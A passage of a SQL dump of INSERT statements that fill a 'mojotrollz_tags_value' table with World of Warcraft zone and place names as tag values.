(`id`, `type`, `value`, `description`) VALUES (390, 2, 'Field of Giants', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (391, 2, 'The Merchant Coast', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (392, 2, 'Ratchet', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (393, 2, 'Darkspear Strand', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (396, 2, 'Winterhoof Water Well', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (397, 2, 'Thunderhorn Water Well', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (398, 2, 'Wildmane Water Well', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (399, 2, 'Skyline Ridge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (400, 2, 'Thousand Needles', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (401, 2, 'The Tidus Stair', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (403, 2, 'Shady Rest Inn', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (404, 2, 'Bael\'dun Digsite', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (405, 2, 'Desolace', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (406, 2, 'Stonetalon Mountains', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (408, 2, 'Gillijim\'s Isle', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (409, 2, 'Island of Doctor Lapidis', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (410, 2, 'Razorwind Canyon', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (411, 2, 'Bathran\'s Haunt', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (412, 2, 'The Ruins of Ordil\'Aran', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (413, 2, 'Maestra\'s Post', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (414, 2, 'The Zoram Strand', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (415, 2, 'Astranaar', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (416, 2, 'The Shrine of Aessina', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (417, 2, 'Fire Scar Shrine', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (418, 2, 'The Ruins of Stardust', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (419, 2, 'The Howling Vale', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (420, 2, 'Silverwind Refuge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (421, 2, 'Mystral Lake', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (422, 2, 'Fallen Sky Lake', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (424, 2, 'Iris Lake', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (425, 2, 'Moonwell', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (426, 2, 'Raynewood Retreat', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (427, 2, 'The Shady Nook', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (428, 2, 'Night Run', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (429, 2, 'Xavian', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (430, 2, 'Satyrnaar', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (431, 2, 'Splintertree Post', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (432, 2, 'The Dor\'Danil Barrow Den', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (433, 2, 'Falfarren River', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (434, 2, 'Felfire Hill', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (435, 2, 'Demon Fall Canyon', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (436, 2, 'Demon Fall Ridge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (437, 2, 'Warsong Lumber Camp', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (438, 2, 'Bough Shadow', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (439, 2, 'The Shimmering Flats', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (440, 2, 'Tanaris', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (441, 2, 'Lake Falathim', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (442, 2, 'Auberdine', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (443, 2, 'Ruins of Mathystra', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (444, 2, 'Tower of Althalaxx', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (445, 2, 'Cliffspring Falls', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (446, 2, 'Bashal\'Aran', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (447, 2, 'Ameth\'Aran', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (448, 2, 'Grove of the Ancients', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (449, 2, 'The Master\'s Glaive', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (450, 2, 'Remtravel\'s Excavation', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (452, 2, 'Mist\'s Edge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (453, 2, 'The Long Wash', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (454, 2, 'Wildbend River', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (455, 2, 'Blackwood Den', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (456, 2, 'Cliffspring River', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (457, 2, 'The Veiled Sea', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (458, 2, 'Gold Road', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (459, 2, 'Scarlet Watch Post', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (460, 2, 'Sun Rock Retreat', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (461, 2, 'Windshear Crag', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (463, 2, 'Cragpool Lake', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (464, 2, 'Mirkfallon Lake', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (465, 2, 'The Charred Vale', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (466, 2, 'Valley of the Bloodfuries', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (467, 2, 'Stonetalon Peak', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (468, 2, 'The Talon Den', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (469, 2, 'Greatwood Vale', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (471, 2, 'Brave Wind Mesa', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (472, 2, 'Fire Stone Mesa', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (473, 2, 'Mantle Rock', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (477, 2, 'Ruins of Jubuwal', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (478, 2, 'Pools of Arlithrien', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (479, 2, 'The Rustmaul Dig Site', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (480, 2, 'Camp E\'thok', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (481, 2, 'Splithoof Crag', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (482, 2, 'Highperch', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (483, 2, 'The Screeching Canyon', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (484, 2, 'Freewind Post', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (485, 2, 'The Great Lift', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (486, 2, 'Galak Hold', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (487, 2, 'Roguefeather Den', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (488, 2, 'The Weathered Nook', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (489, 2, 'Thalanaar', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (490, 2, 'Un\'Goro Crater', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (491, 2, 'Razorfen Kraul', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (492, 2, 'Raven Hill Cemetery', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (493, 2, 'Moonglade', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (496, 2, 'Brackenwall Village', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (497, 2, 'Swamplight Manor', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (498, 2, 'Bloodfen Burrow', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (499, 2, 'Darkmist Cavern', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (500, 2, 'Moggle Point', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (501, 2, 'Beezil\'s Wreck', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (502, 2, 'Witch Hill', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (503, 2, 'Sentry Point', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (504, 2, 'North Point Tower', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (505, 2, 'West Point Tower', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (506, 2, 'Lost Point', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (507, 2, 'Bluefen', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (508, 2, 'Stonemaul Ruins', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (509, 2, 'The Den of Flame', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (510, 2, 'The Dragonmurk', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (511, 2, 'Wyrmbog', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (512, 2, 'Onyxia\'s Lair', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (513, 2, 'Theramore Isle', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (514, 2, 'Foothold Citadel', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (515, 2, 'Ironclad Prison', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (516, 2, 'Dustwallow Bay', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (517, 2, 'Tidefury Cove', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (518, 2, 'Dreadmurk Shore', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (536, 2, 'Addle\'s Stead', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (537, 2, 'Fire Plume Ridge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (538, 2, 'Lakkari Tar Pits', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (539, 2, 'Terror Run', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (540, 2, 'The Slithering Scar', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (541, 2, 'Marshal\'s Refuge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (542, 2, 'Fungal Rock', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (543, 2, 'Golakka Hot Springs', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (556, 2, 'The Loch', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (576, 2, 'Beggar\'s Haunt', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (596, 2, 'Kodo Graveyard', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (597, 2, 'Ghost Walker Post', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (598, 2, 'Sar\'theris Strand', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (599, 2, 'Thunder Axe Fortress', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (600, 2, 'Bolgan\'s Hole', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (602, 2, 'Mannoroc Coven', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (603, 2, 'Sargeron', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (604, 2, 'Magram Village', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (606, 2, 'Gelkis Village', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (607, 2, 'Valley of Spears', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (608, 2, 'Nijel\'s Point', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (609, 2, 'Kolkar Village', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (616, 2, 'Hyjal', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (618, 2, 'Winterspring', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (636, 2, 'Blackwolf River', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (637, 2, 'Kodo Rock', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (638, 2, 'Hidden Path', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (639, 2, 'Spirit Rock', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (640, 2, 'Shrine of the Dormant Flame', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (656, 2, 'Lake Elune\'ara', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (657, 2, 'The Harborage', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (676, 2, 'Outland', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (696, 2, 'Craftsmen\'s Terrace', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (697, 2, 'Tradesmen\'s Terrace', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (698, 2, 'The Temple Gardens', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (699, 2, 'Temple of Elune', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (700, 2, 'Cenarion Enclave', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (701, 2, 'Warrior\'s Terrace', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (702, 2, 'Rut\'theran Village', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (716, 2, 'Ironband\'s Compound', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (717, 2, 'The Stockade', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (718, 2, 'Wailing Caverns', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (719, 2, 'Blackfathom Deeps', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (720, 2, 'Fray Island', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (721, 2, 'Gnomeregan', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (722, 2, 'Razorfen Downs', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (736, 2, 'Ban\'ethil Hollow', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (796, 2, 'Scarlet Monastery', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (797, 2, 'Jerod\'s Landing', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (798, 2, 'Ridgepoint Tower', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (799, 2, 'The Darkened Bank', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (800, 2, 'Coldridge Pass', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (801, 2, 'Chill Breeze Valley', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (802, 2, 'Shimmer Ridge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (803, 2, 'Amberstill Ranch', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (804, 2, 'The Tundrid Hills', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (805, 2, 'South Gate Pass', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (806, 2, 'South Gate Outpost', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (807, 2, 'North Gate Pass', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (808, 2, 'North Gate Outpost', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (809, 2, 'Gates of Ironforge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (810, 2, 'Stillwater Pond', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (811, 2, 'Nightmare Vale', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (812, 2, 'Venomweb Vale', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (813, 2, 'The Bulwark', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (814, 2, 'Southfury River', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (815, 2, 'Southfury River', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (816, 2, 'Razormane Grounds', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (817, 2, 'Skull Rock', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (818, 2, 'Palemane Rock', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (819, 2, 'Windfury Ridge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (820, 2, 'The Golden Plains', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (821, 2, 'The Rolling Plains', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (836, 2, 'Dun Algaz', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (837, 2, 'Dun Algaz', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (838, 2, 'North Gate Pass', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (839, 2, 'South Gate Pass', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (856, 2, 'Twilight Grove', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (876, 2, 'GM Island', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (878, 2, 'Southfury River', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (879, 2, 'Southfury River', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (880, 2, 'Thandol Span', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (881, 2, 'Thandol Span', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (896, 2, 'Purgation Isle', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (916, 2, 'The Jansen Stead', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (917, 2, 'The Dead Acre', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (918, 2, 'The Molsen Farm', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (919, 2, 'Stendel\'s Pond', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (920, 2, 'The Dagger Hills', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (921, 2, 'Demont\'s Place', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (922, 2, 'The Dust Plains', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (923, 2, 'Stonesplinter Valley', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (924, 2, 'Valley of Kings', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (925, 2, 'Algaz Station', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (926, 2, 'Bucklebree Farm', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (927, 2, 'The Shining Strand', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (928, 2, 'North Tide\'s Hollow', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (936, 2, 'Grizzlepaw Ridge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (956, 2, 'The Verdant Fields', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (976, 2, 'Gadgetzan', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (977, 2, 'Steamwheedle Port', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (978, 2, 'Zul\'Farrak', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (979, 2, 'Sandsorrow Watch', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (980, 2, 'Thistleshrub Valley', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (981, 2, 'The Gaping Chasm', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (982, 2, 'The Noxious Lair', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (983, 2, 'Dunemaul Compound', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (984, 2, 'Eastmoon Ruins', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (985, 2, 'Waterspring Field', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (986, 2, 'Zalashji\'s Den', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (987, 2, 'Land\'s End Beach', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (988, 2, 'Wavestrider Beach', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (989, 2, 'Uldum', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (990, 2, 'Valley of the Watchers', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (991, 2, 'Gunstan\'s Post', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (992, 2, 'Southmoon Ruins', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (996, 2, 'Render\'s Camp', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (997, 2, 'Render\'s Valley', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (998, 2, 'Render\'s Rock', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (999, 2, 'Stonewatch Tower', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1000, 2, 'Galardell Valley', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1001, 2, 'Lakeridge Highway', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1002, 2, 'Three Corners', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1016, 2, 'Direforge Hill', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1017, 2, 'Raptor Ridge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1018, 2, 'Black Channel Marsh', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1019, 2, 'The Green Belt', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1020, 2, 'Mosshide Fen', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1021, 2, 'Thelgen Rock', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, 